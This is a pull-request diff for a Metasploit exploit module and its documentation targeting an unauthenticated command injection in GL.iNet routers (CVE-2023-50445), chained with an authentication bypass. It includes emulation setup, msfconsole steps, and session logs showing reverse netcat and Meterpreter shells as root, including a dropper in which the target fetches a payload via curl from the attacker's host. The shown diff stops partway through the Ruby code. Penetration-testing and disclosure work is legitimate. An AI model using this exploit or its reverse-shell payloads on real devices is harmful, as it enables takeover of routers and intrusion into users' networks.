### PR TITLE
GL.iNet unauthenticated RCE [CVE-2023-50445] 

### DIFF
--- a/documentation/modules/exploit/linux/http/glinet_unauth_rce_cve_2023_50445.md
+++ b/documentation/modules/exploit/linux/http/glinet_unauth_rce_cve_2023_50445.md
@@ -242,7 +242,7 @@ Description:
   - SFT1200: v4.3.6;
   - and potentially others (just try ;-)
 
-  NOTE: Staged meterpreter payloads might core dump on the target, so use stage-less meterpreter payloads
+  NOTE: Staged Meterpreter payloads might core dump on the target, so use stage-less Meterpreter payloads
   when using the Linux Dropper target.
 
 References:
@@ -316,4 +316,4 @@ meterpreter >
 ```
 
 ## Limitations
-Staged meterpreter payloads might core dump on the target, so use stage-less meterpreter payloads when using the Linux Dropper target.
+Staged Meterpreter payloads might core dump on the target, so use stage-less Meterpreter payloads when using the Linux Dropper target.

--- a/documentation/modules/exploit/linux/http/glinet_unauth_rce_cve_2023_50445.md
+++ b/documentation/modules/exploit/linux/http/glinet_unauth_rce_cve_2023_50445.md
@@ -230,10 +230,10 @@ Description:
   retrieved without knowing a valid username and password.
 
   The following GL.iNet network products are vulnerable:
-  - A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A => v4.0.0 < v4.5.0;
-  - MT6000 => v4.5.0 - v4.5.3;
-  - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300 => v4.3.7;
-  - E750/E750V2, MV1000 => v4.3.8;
+  - A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A: v4.0.0 < v4.5.0;
+  - MT6000: v4.5.0 - v4.5.3;
+  - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300: v4.3.7;
+  - E750/E750V2, MV1000: v4.3.8;
   - and potentially others (just try ;-)
 
   NOTE: Staged meterpreter payloads might core dump on the target, so use stage-less meterpreter payloads

--- a/documentation/modules/exploit/linux/http/glinet_unauth_rce_cve_2023_50445.md
+++ b/documentation/modules/exploit/linux/http/glinet_unauth_rce_cve_2023_50445.md
@@ -13,7 +13,7 @@ The following GL.iNet network products are vulnerable:
  - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300: v4.3.7;
  - E750/E750V2, MV1000: v4.3.8;
  - X3000: v4.0.0 - v4.4.2;
- - XE3000: v4.0.0 - v4.4.3
+ - XE3000: v4.0.0 - v4.4.3;
  - SFT1200: v4.3.6;
  - and potentially others (just try ;-)
 
@@ -238,7 +238,7 @@ Description:
   - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300: v4.3.7;
   - E750/E750V2, MV1000: v4.3.8;
   - X3000: v4.0.0 - v4.4.2;
-  - XE3000: v4.0.0 - v4.4.3
+  - XE3000: v4.0.0 - v4.4.3;
   - SFT1200: v4.3.6;
   - and potentially others (just try ;-)
 

--- a/documentation/modules/exploit/linux/http/glinet_unauth_rce_cve_2023_50445.md
+++ b/documentation/modules/exploit/linux/http/glinet_unauth_rce_cve_2023_50445.md
@@ -12,6 +12,9 @@ The following GL.iNet network products are vulnerable:
  - MT6000: v4.5.0 - v4.5.3;
  - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300: v4.3.7;
  - E750/E750V2, MV1000: v4.3.8;
+ - X3000: v4.0.0 - v4.4.2;
+ - XE3000: v4.0.0 - v4.4.3
+ - SFT1200: v4.3.6;
  - and potentially others (just try ;-)
 
 ## Installation
@@ -234,6 +237,9 @@ Description:
   - MT6000: v4.5.0 - v4.5.3;
   - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300: v4.3.7;
   - E750/E750V2, MV1000: v4.3.8;
+  - X3000: v4.0.0 - v4.4.2;
+  - XE3000: v4.0.0 - v4.4.3
+  - SFT1200: v4.3.6;
   - and potentially others (just try ;-)
 
   NOTE: Staged meterpreter payloads might core dump on the target, so use stage-less meterpreter payloads

--- a/documentation/modules/exploit/linux/http/glinet_unauth_rce_cve_2023_50445.md
+++ b/documentation/modules/exploit/linux/http/glinet_unauth_rce_cve_2023_50445.md
@@ -8,10 +8,10 @@ string pattern matching and SQL injection vulnerability.
 The `AdminToken` cookie / `SID` can be retrieved without knowing a valid username and password.
 
 The following GL.iNet network products are vulnerable:
- - A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A => v4.0.0 < v4.5.0;
- - MT6000 => v4.5.0 - v4.5.3;
- - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300 => v4.3.7;
- - E750/E750V2, MV1000 => v4.3.8;
+ - A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A: v4.0.0 < v4.5.0;
+ - MT6000: v4.5.0 - v4.5.3;
+ - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300: v4.3.7;
+ - E750/E750V2, MV1000: v4.3.8;
  - and potentially others (just try ;-)
 
 ## Installation
@@ -19,12 +19,11 @@ Ideally, to test this module, you would need a vulnerable GL.iNet device.
 However, by downloading the firmware and install and use `FirmAE` to emulate the router,
 we can simulate the router and test the vulnerable endpoint.
 
-This module has been tested on:
-- [x] FirmAE running on Kali Linux 2023.11
-* GL.iNet Router model AR300M with  firmware v4.3.7
-* GL.iNet Router model AR300M16 with  firmware v4.3.7
-* GL.iNet Router model MT300N-V2 with  firmware v4.3.7
-* GL.iNet Router model MT1300 with  firmware v4.3.7
+This module has been tested via FirmAE running on Kali Linux 2023.11 at the following emulated targets:
+* GL.iNet Router model AR300M with firmware v4.3.7
+* GL.iNet Router model AR300M16 with firmware v4.3.7
+* GL.iNet Router model MT300N-V2 with firmware v4.3.7
+* GL.iNet Router model MT1300 with firmware v4.3.7
 
 ### Installation steps to emulate the router firmware with FirmAE
 * Install `FirmAE` on your Linux distribution using the installation instructions provided [here](https://github.com/pr0v3rbs/FirmAE).

--- a/documentation/modules/exploit/linux/http/glinet_unauth_rce_cve_2023_50445.md
+++ b/documentation/modules/exploit/linux/http/glinet_unauth_rce_cve_2023_50445.md
@@ -1,0 +1,314 @@
+## Vulnerable Application
+A command injection vulnerability exists in multiple GL.iNet network products, allowing an attacker to inject and execute
+arbitrary shell commands via JSON parameters at the `gl_system_log` and `gl_crash_log` interface in the `logread` module.
+This exploit requires post-authentication using the `AdminToken` cookie / session ID (`SID`), typically stolen by the attacker.
+
+However, by chaining this exploit with vulnerability CVE-2023-50919, one can bypass the Nginx authentication through a `Lua`
+string pattern matching and SQL injection vulnerability.
+The `AdminToken` cookie / `SID` can be retrieved without knowing a valid username and password.
+
+The following GL.iNet network products are vulnerable:
+ - A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A => v4.0.0 < v4.5.0;
+ - MT6000 => v4.5.0 - v4.5.3;
+ - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300 => v4.3.7;
+ - E750/E750V2, MV1000 => v4.3.8;
+ - and potentially others (just try ;-)
+
+## Installation
+Ideally, to test this module, you would need a vulnerable GL.iNet device.
+However, by downloading the firmware and install and use `FirmAE` to emulate the router,
+we can simulate the router and test the vulnerable endpoint.
+
+This module has been tested on:
+- [x] FirmAE running on Kali Linux 2023.11
+* GL.iNet Router model AR300M with  firmware v4.3.7
+* GL.iNet Router model AR300M16 with  firmware v4.3.7
+* GL.iNet Router model MT300N-V2 with  firmware v4.3.7
+* GL.iNet Router model MT1300 with  firmware v4.3.7
+
+### Installation steps to emulate the router firmware with FirmAE
+* Install `FirmAE` on your Linux distribution using the installation instructions provided [here](https://github.com/pr0v3rbs/FirmAE).
+* To emulate the specific firmware that comes with the GL.iNet devices, `binwalk` might need to be able to handle a sasquatch filesystem.
+* Find the additional installation/compilation steps [here](https://gist.github.com/thanoskoutr/4ea24a443879aa7fc04e075ceba6f689).
+* Please do not forget to run this after your `FirmAE` installation otherwise you will not be able to extract the firmware.
+* Download  the vulnerable firmware from GL.iNet [here](https://dl.gl-inet.com/?model=ar300m16).
+* We will pick `openwrt-ar300m16-4.3.7-0913-1694589994.bin` for the demonstration.
+* Start emulation.
+* First run `./init.sh` to initialize and start the Postgress database.
+* Start a debug session  `./run.sh -d GL.iNet /root/FirmAE/firmwares/openwrt-ar300m16-4.3.7-0913-1694589994.bin`
+* This will take a while, but in the end you should see the following...
+
+```shell
+ # ./run.sh -d GL.iNet /root/FirmAE/firmwares/openwrt-ar300m16-4.3.7-0913-1694589994.bin
+[*] /root/FirmAE/firmwares/openwrt-ar300m16-4.3.7-0913-1694589994.bin emulation start!!!
+[*] extract done!!!
+[*] get architecture done!!!
+mke2fs 1.47.0 (5-Feb-2023)
+mknod: /dev/console: File exists
+e2fsck 1.47.0 (5-Feb-2023)
+[*] infer network start!!!
+
+[IID] 91
+[MODE] debug
+[+] Network reachable on 192.168.1.1!
+[+] Run debug!
+Creating TAP device tap91_0...
+Set 'tap91_0' persistent and owned by uid 0
+Bringing up TAP device...
+Starting emulation of firmware... 192.168.1.1 true false 11.438110994 -1
+/root/FirmAE/./debug.py:7: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
+  import telnetlib
+[*] firmware - openwrt-ar300m16-4.3.7-0913-1694589994
+[*] IP - 192.168.1.1
+[*] connecting to netcat (192.168.1.1:31337)
+[-] failed to connect netcat
+------------------------------
+|       FirmAE Debugger      |
+------------------------------
+1. connect to socat
+2. connect to shell
+3. tcpdump
+4. run gdbserver
+5. file transfer
+6. exit
+> 1
+/ #
+/ # ifconfig
+ifconfig
+br-lan    Link encap:Ethernet  HWaddr 52:54:00:12:34:56
+          inet addr:192.168.8.1  Bcast:192.168.8.255  Mask:255.255.255.0
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          RX packets:392 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:0
+          RX bytes:33970 (33.1 KiB)  TX bytes:0 (0.0 B)
+
+eth0      Link encap:Ethernet  HWaddr 52:54:00:12:34:56
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          RX packets:427 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:44 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:1000
+          RX bytes:42072 (41.0 KiB)  TX bytes:5068 (4.9 KiB)
+
+eth1      Link encap:Ethernet  HWaddr 52:54:00:12:34:57
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:940 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:1000
+          RX bytes:0 (0.0 B)  TX bytes:321480 (313.9 KiB)
+
+lo        Link encap:Local Loopback
+          inet addr:127.0.0.1  Mask:255.0.0.0
+          inet6 addr: ::1/128 Scope:Host
+          UP LOOPBACK RUNNING  MTU:65536  Metric:1
+          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:0
+          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
+
+/ # netstat -rn
+netstat -rn
+Kernel IP routing table
+Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
+192.168.8.0     0.0.0.0         255.255.255.0   U         0 0          0 br-lan
+```
+
+* You should now be able to `ping` the network address 192.168.8.1 from your host.
+* Run a `nmap` command to check the services (HTTP TCP port 80).
+* NOTE: please check your tap network interface on your host because it might have the wrong IP setting.
+* You can change this with: `ip a del 192.168.1.2/24 dev tap91_0` and `ip a add 192.168.8.2/24 dev tap91_0`.
+
+```shell
+ # ifconfig tap91_0
+tap91_0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
+        inet 192.168.1.2  netmask 255.255.255.0  broadcast 0.0.0.0
+        inet6 fe80::6c06:aff:fefb:ab29  prefixlen 64  scopeid 0x20<link>
+        ether 6e:06:0a:fb:ab:29  txqueuelen 1000  (Ethernet)
+        RX packets 39  bytes 4692 (4.5 KiB)
+        RX errors 0  dropped 0  overruns 0  frame 0
+        TX packets 50  bytes 4044 (3.9 KiB)
+        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
+```
+```shell
+ # ping 192.168.8.1
+PING 192.168.8.1 (192.168.8.1) 56(84) bytes of data.
+64 bytes from 192.168.8.1: icmp_seq=1 ttl=64 time=9.2 ms
+64 bytes from 192.168.8.1: icmp_seq=2 ttl=64 time=3.18 ms
+^C
+--- 192.168.8.1 ping statistics ---
+2 packets transmitted, 2 received, 0% packet loss, time 1001ms
+rtt min/avg/max/mdev = 2.384/5.650/8.916/3.266 ms
+ # nmap 192.168.8.1
+Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-03 14:47 UTC
+Nmap scan report for 192.168.8.1
+Host is up (0.020s latency).
+Not shown: 997 closed tcp ports (reset)
+PORT    STATE SERVICE
+53/tcp  open  domain
+80/tcp  open  http
+443/tcp open  https
+MAC Address: 52:54:00:12:34:57 (QEMU virtual NIC)
+```
+You are now ready to test the module using the emulated router hardware on IP address `192.168.8.1`.
+
+## Verification Steps
+- [x] Start `msfconsole`
+- [x] `use exploit/linux/http/glinet_unauth_rce_cve_2023_50445`
+- [x] `set rhosts <ip-target>`
+- [x] `set lhost <ip-attacker>`
+- [x] `set target <0=Unix Command, 1=Linux Dropper>`
+- [x] `exploit`
+
+You should get a `shell` or `Meterpreter`.
+
+```shell
+msf6 exploit(linux/http/glinet_unauth_rce_cve_2023_50445) > info
+
+       Name: GL.iNet Unauthenticated Remote Command Execution via the logread module.
+     Module: exploit/linux/http/glinet_unauth_rce_cve_2023_50445
+   Platform: Unix, Linux
+       Arch: cmd, mipsle, mipsbe, armle
+ Privileged: Yes
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2013-12-10
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  Unknown
+  DZONERZY
+
+Module side effects:
+ ioc-in-logs
+ artifacts-on-disk
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   Unix Command
+      1   Linux Dropper
+
+Check supported:
+  Yes
+
+Basic options:
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+  RPORT    80               yes       The target port (UDP)
+  SID                       no        Session ID
+  SSL      false            no        Negotiate SSL/TLS for outgoing connections
+  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+  URIPATH                   no        The URI to use for this exploit (default is random)
+  VHOST                     no        HTTP server virtual host
+
+
+  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen o
+                                      n all addresses.
+  SRVPORT  8080             yes       The local port to listen on.
+
+Payload information:
+
+Description:
+  A command injection vulnerability exists in multiple GL.iNet network products, allowing an attacker
+  to inject and execute arbitrary shell commands via JSON parameters at the `gl_system_log` and `gl_crash_log`
+  interface in the `logread` module.
+  This exploit requires post-authentication using the `Admin-Token` cookie/sessionID (`SID`), typically stolen
+  by the attacker.
+  However, by chaining this exploit with vulnerability CVE-2023-50919, one can bypass the Nginx authentication
+  through a `Lua` string pattern matching and SQL injection vulnerability. The `Admin-Token` cookie/`SID` can be
+  retrieved without knowing a valid username and password.
+
+  The following GL.iNet network products are vulnerable:
+  - A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A => v4.0.0 < v4.5.0;
+  - MT6000 => v4.5.0 - v4.5.3;
+  - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300 => v4.3.7;
+  - E750/E750V2, MV1000 => v4.3.8;
+  - and potentially others (just try ;-)
+
+  NOTE: Staged meterpreter payloads might core dump on the target, so use stage-less meterpreter payloads
+  when using the Linux Dropper target.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2023-50445
+  https://nvd.nist.gov/vuln/detail/CVE-2023-50919
+  https://attackerkb.com/topics/3LmJ0d7rzC/cve-2023-50445
+  https://attackerkb.com/topics/LdqSuqHKOj/cve-2023-50919
+  https://libdzonerzy.so/articles/from-zero-to-botnet-glinet.html
+  https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Using%20Shell%20Metacharacter%20Injection%20via%20API.md
+
+
+View the full module info with the info -d command.
+```
+
+## Options
+### SID
+This is the SessionID (`SID`) which you need for authentication.
+The module will exploit and grab the `SID` autmatically, but you can also provide it manually by using this option.
+
+## Scenarios
+###  FirmAE GL.iNet AR300M16 Router Emulation Unix Command - cmd/unix/reverse_netcat
+```shell
+msf6 exploit(linux/http/glinet_unauth_rce_cve_2023_50445) > set target 0
+target => 0
+msf6 exploit(linux/http/glinet_unauth_rce_cve_2023_50445) > exploit
+
+[*] Started reverse TCP handler on 192.168.8.2:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.8.1:80 can be exploited.
+[!] The service is running, but could not be validated. Product info: |4.3.7|n/a
+[*] SID: NsPHdkXtENoaotxVZWLqJorU52O7J0OI
+[*] Executing Unix Command for cmd/unix/reverse_netcat
+[*] Command shell session 8 opened (192.168.8.2:4444 -> 192.168.8.1:53167) at 2024-01-03 11:12:18 +0000
+
+pwd
+/
+id
+uid=0(root) gid=0(root) groups=0(root),65533(nonevpn)
+uname -a
+Linux GL- 4.1.17+ #28 Sat Oct 31 17:56:39 KST 2020 mips GNU/Linux
+exit
+```
+### FirmAE GL.iNet AR300M16 Router Emulation Linux Dropper - linux/mipsbe/meterpreter_reverse_tcp
+```shell
+msf6 exploit(linux/http/glinet_unauth_rce_cve_2023_50445) > set target 1
+target => 1
+msf6 exploit(linux/http/glinet_unauth_rce_cve_2023_50445) > exploit
+
+[*] Started reverse TCP handler on 192.168.8.2:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.8.1:80 can be exploited.
+[!] The service is running, but could not be validated. Product info: |4.3.7|n/a
+[*] SID: Gs2KPnIsIQQUzHQkEBVN8JOcq5nV008e
+[*] Executing Linux Dropper for linux/mipsbe/meterpreter_reverse_tcp
+[*] Using URL: http://192.168.8.2:1981/OrfVHM15cua0w
+[*] Client 192.168.8.1 (curl/7.88.1) requested /OrfVHM15cua0w
+[*] Sending payload to 192.168.8.1 (curl/7.88.1)
+[*] Meterpreter session 9 opened (192.168.8.2:4444 -> 192.168.8.1:48511) at 2024-01-03 08:30:52 +0000
+[*] Command Stager progress - 100.00% done (117/117 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.8.1
+OS           :  (Linux 4.1.17+)
+Architecture : mips
+BuildTuple   : mips-linux-muslsf
+Meterpreter  : mipsbe/linux
+meterpreter > 
+```
+
+## Limitations
+Staged meterpreter payloads might core dump on the target, so use stage-less meterpreter payloads when using the Linux Dropper target.

--- a/modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb
+++ b/modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
           - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300: v4.3.7;
           - E750/E750V2, MV1000: v4.3.8;
           - X3000: v4.0.0 - v4.4.2;
-          - XE3000: v4.0.0 - v4.4.3
+          - XE3000: v4.0.0 - v4.4.3;
           - SFT1200: v4.3.6;
           - and potentially others (just try ;-)
 

--- a/modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb
+++ b/modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
           - SFT1200: v4.3.6;
           - and potentially others (just try ;-)
 
-          NOTE: Staged Meterpreter payloads might core dump on the target, so use stage-less meterpreter payloads
+          NOTE: Staged Meterpreter payloads might core dump on the target, so use stage-less Meterpreter payloads
           when using the Linux Dropper target.
         },
         'License' => MSF_LICENSE,

--- a/modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb
+++ b/modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb
@@ -3,6 +3,8 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'digest/md5'
+
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -15,18 +17,23 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'GL.Inet Unauthenticated Remote Command Execution via the logread module.',
+        'Name' => 'GL.iNet Unauthenticated Remote Command Execution via the logread module.',
         'Description' => %q{
-          A command injection vulnerability exists in multiple GL.Inet network products, allowing an attacker
-          to inject and execute arbitrary shell commands via JSON parameters at the gl_system_log and gl_crash_log
-          interface in the logread module.
-          This exploit requires post-authentication using the AdminToken cookie (SID), typically stolen by the attacker.
-          However, by chaining this exploit with vulnerability CVE-2023-50919, you can bypass the Nginx authentication through
-          a Lua string pattern matching vulnerability. The session ID (SID) can be retrieved without knowing a
-          valid username and password.
-          GL.Inet network products with firmware versions between `4.0.0` and `4.5.0` are vulnerable.
-          Vulnerabilities are fixed in the `4.5.0` version.
+          A command injection vulnerability exists in multiple GL.iNet network products, allowing an attacker
+          to inject and execute arbitrary shell commands via JSON parameters at the `gl_system_log` and `gl_crash_log`
+          interface in the `logread` module.
+          This exploit requires post-authentication using the `Admin-Token` cookie/sessionID (`SID`), typically stolen
+          by the attacker.
+          However, by chaining this exploit with vulnerability CVE-2023-50919, you can bypass the Nginx authentication
+          through a `Lua` string pattern matching and SQL injection vulnerability. The `Admin-Token` cookie/`SID` can be
+          retrieved without knowing a valid username and password.
 
+          The following GL.iNet network products are vulnerable:
+          - A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A => v4.0.0 < v4.5.0;
+          - MT6000 => v4.5.0 - v4.5.3;
+          - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300 => v4.3.7;
+          - E750/E750V2, MV1000 => v4.3.8;
+          - and potentially others (just try ;-)
 
           NOTE: Staged meterpreter payloads might core dump on the target, so use stage-less meterpreter payloads
           when using the Linux Dropper target.
@@ -34,15 +41,16 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' => [
           'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
-          'DZONERZY', # Discovery of the vulnerability CVE-2023-50919
-          'Naihsin https://github.com/naihsin'
+          'Unknown', # Discovery of the vulnerability CVE-2023-50445
+          'DZONERZY' # Discovery of the vulnerability CVE-2023-50919
 
         ],
         'References' => [
           ['CVE', '2023-50445'],
-          ['CVE', '2020-50919'],
-          ['URL', 'https://attackerkb.com/topics/uqicA23ecz/cve-2023-50919'],
-          ['URL', 'https://attackerkb.com/topics/uqicA23ecz/cve-2023-50445'],
+          ['CVE', '2023-50919'],
+          ['URL', 'https://attackerkb.com/topics/3LmJ0d7rzC/cve-2023-50445'],
+          ['URL', 'https://attackerkb.com/topics/LdqSuqHKOj/cve-2023-50919'],
+          ['URL', 'https://libdzonerzy.so/articles/from-zero-to-botnet-glinet.html'],
           ['URL', 'https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Using%20Shell%20Metacharacter%20Injection%20via%20API.md']
         ],
         'DisclosureDate' => '2013-12-10',
@@ -53,11 +61,11 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Unix Command',
             {
-              'Platform' => ['unix', 'linux'],
+              'Platform' => 'unix',
               'Arch' => ARCH_CMD,
               'Type' => :unix_cmd,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/bind_busybox_telnetd'
+                'PAYLOAD' => 'cmd/unix/reverse_netcat'
               }
             }
           ],
@@ -67,10 +75,10 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => 'linux',
               'Arch' => [ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE],
               'Type' => :linux_dropper,
-              'CmdStagerFlavor' => ['wget', 'curl', 'echo', 'printf', 'bourne'],
+              'CmdStagerFlavor' => ['curl', 'wget', 'echo', 'printf', 'bourne'],
               'Linemax' => 900,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
+                'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp'
               }
             }
           ]
@@ -92,250 +100,148 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
   end
 
-  def vuln_version?(res)
-    # checks the model, firmware and hardware version
-    @d_link = { 'product' => nil, 'firmware' => nil, 'hardware' => nil, 'arch' => nil }
-    html = Nokogiri.HTML(res.body, nil, 'UTF-8')
-
-    # USE CASE #1: D-link devices with static HTML pages with model and version information
-    # class identifiers: <span class="product">, <span class="version"> and <span class="hwversion">
-    # See USE CASE #4 for D-link devices that use javascript to dynamically generate the model and firmware version
-    product = html.css('span[@class="product"]')
-    @d_link['product'] = product[0].text.split(':')[1].strip unless product[0].nil?
-    firmware = html.css('span[@class="version"]')
-    @d_link['firmware'] = firmware[0].text.split(':')[1].strip.delete(' ') unless firmware[0].nil?
-
-    # DIR-600, DIR-300 hardware B revision  and maybe other models are using the "version" class tag for both firmware and hardware version
-    @d_link['hardware'] = firmware[1].text.split(':')[1].strip unless firmware[1].nil?
-    # otherwise search for the "hwversion" class tag
-    hardware = html.css('span[@class="hwversion"]')
-    @d_link['hardware'] = hardware[0].text.split(':')[1].strip unless hardware[0].nil?
-
-    # USE CASE #2: D-link devices with static HTML pages with model and version information
-    # class identifiers: <div class="pp">, <div class="fwv"> and <div class="hwv">
-    if @d_link['product'].nil?
-      product = html.css('div[@class="pp"]')
-      @d_link['product'] = product[0].text.split(':')[1].strip unless product[0].nil?
-      firmware = html.css('div[@class="fwv"]')
-      @d_link['firmware'] = firmware[0].text.split(':')[1].strip.delete(' ') unless firmware[0].nil?
-      hardware = html.css('div[@class="hwv"]')
-      @d_link['hardware'] = hardware[0].text.split(':')[1].strip unless hardware[0].nil?
-    end
-
-    # USE CASE #3: D-link devices with html below for model, firmware and hardware version
-    # <td>Product Page&nbsp;:&nbsp;<a href='http://support.dlink.com.tw'  target=_blank><font class=l_tb>DIR-300</font></a>&nbsp;&nbsp;&nbsp;</td>
-    # <td noWrap align="right">Hardware Version&nbsp;:&nbsp;rev N/A&nbsp;</td>
-    # <td noWrap align="right">Firmware Version&nbsp;:&nbsp;1.06&nbsp;</td>
-    if @d_link['product'].nil?
-      hwinfo_table = html.css('td')
-      hwinfo_table.each do |hwinfo|
-        @d_link['product'] = hwinfo.text.split(':')[1].strip.gsub(/\p{Space}*/u, '') if hwinfo.text =~ /Product Page/i || hwinfo.text =~ /Product/i
-        @d_link['hardware'] = hwinfo.text.split(':')[1].strip.gsub(/\p{Space}*/u, '') if hwinfo.text =~ /Hardware Version/i
-        @d_link['firmware'] = hwinfo.text.split(':')[1].strip.gsub(/\p{Space}*/u, '') if hwinfo.text =~ /Firmware Version/i
+  def vuln_version?
+    @glinet = { 'model' => nil, 'firmware' => nil, 'arch' => nil }
+    # check first with version 4.x api call
+    post_data = "{\"jsonrpc\":\"2.0\",\"id\":#{rand(1000..9999)},\"method\":\"call\",\"params\":[\"\",\"ui\",\"check_initialized\",{}]}"
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'text/json',
+      'uri' => normalize_uri(target_uri.path, 'rpc'),
+      'data' => post_data.to_s
+    })
+    if res && res.code == 200 && res.body.include?('result')
+      res_json = res.get_json_document
+      unless res_json.blank?
+        @glinet['model'] = res_json['result']['model']
+        @glinet['firmware'] = res_json['result']['firmware_version']
       end
-    end
-
-    # USE CASE #4: D-Link devices with HTML listed below that contains the model, firmware and hardware version
-    # <table id="header_container" border="0" cellpadding="5" cellspacing="0" width="838" align="center">
-    # <tr>
-    #   <td width="100%">&nbsp;&nbsp;<script>show_words(TA2)</script>: <a href="http://support.dlink.com.tw/">DIR-835</a></td>
-    #   <td align="right" nowrap><script>show_words(TA3)</script>: A1 &nbsp;</td>
-    #   <td align="right" nowrap><script>show_words(sd_FWV)</script>: 1.04</td>
-    #   <td>&nbsp;</td>
-    # </tr>
-    # </table>
-    if @d_link['product'].nil?
-      hwinfo_table = html.css('table#header_container td')
-      hwinfo_table.each do |hwinfo|
-        @d_link['product'] = hwinfo.text.split(':')[1].strip.gsub(/\p{Space}*/u, '') if hwinfo.text =~ /show_words\(TA2\)/i
-        @d_link['hardware'] = hwinfo.text.split(':')[1].strip.gsub(/\p{Space}*/u, '') if hwinfo.text =~ /show_words\(TA3\)/i
-        @d_link['firmware'] = hwinfo.text.split(':')[1].strip.gsub(/\p{Space}*/u, '') if hwinfo.text =~ /show_words\(sd_FWV\)/i
-      end
-    end
-
-    # USE CASE #5: D-Link devices with dynamically generated version and hardware information
-    # Create HNAP POST request to get these hardware details
-    if @d_link['product'].nil?
-      xml_soap_data = <<~EOS
-        <?xml version="1.0" encoding="utf-8"?>
-          <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
-            <soap:Body>
-              <GetDeviceSettings xmlns="http://purenetworks.com/HNAP1/" />
-            </soap:Body>
-          </soap:Envelope>
-      EOS
+    else
+      # check with version 3.x api call. These versions are NOT vulnerable
       res = send_request_cgi({
-        'rport' => datastore['HTTP_PORT'],
-        'method' => 'POST',
-        'ctype' => 'text/xml',
-        'uri' => normalize_uri(target_uri.path, 'HNAP1', '/'),
-        'data' => xml_soap_data.to_s,
-        'headers' => {
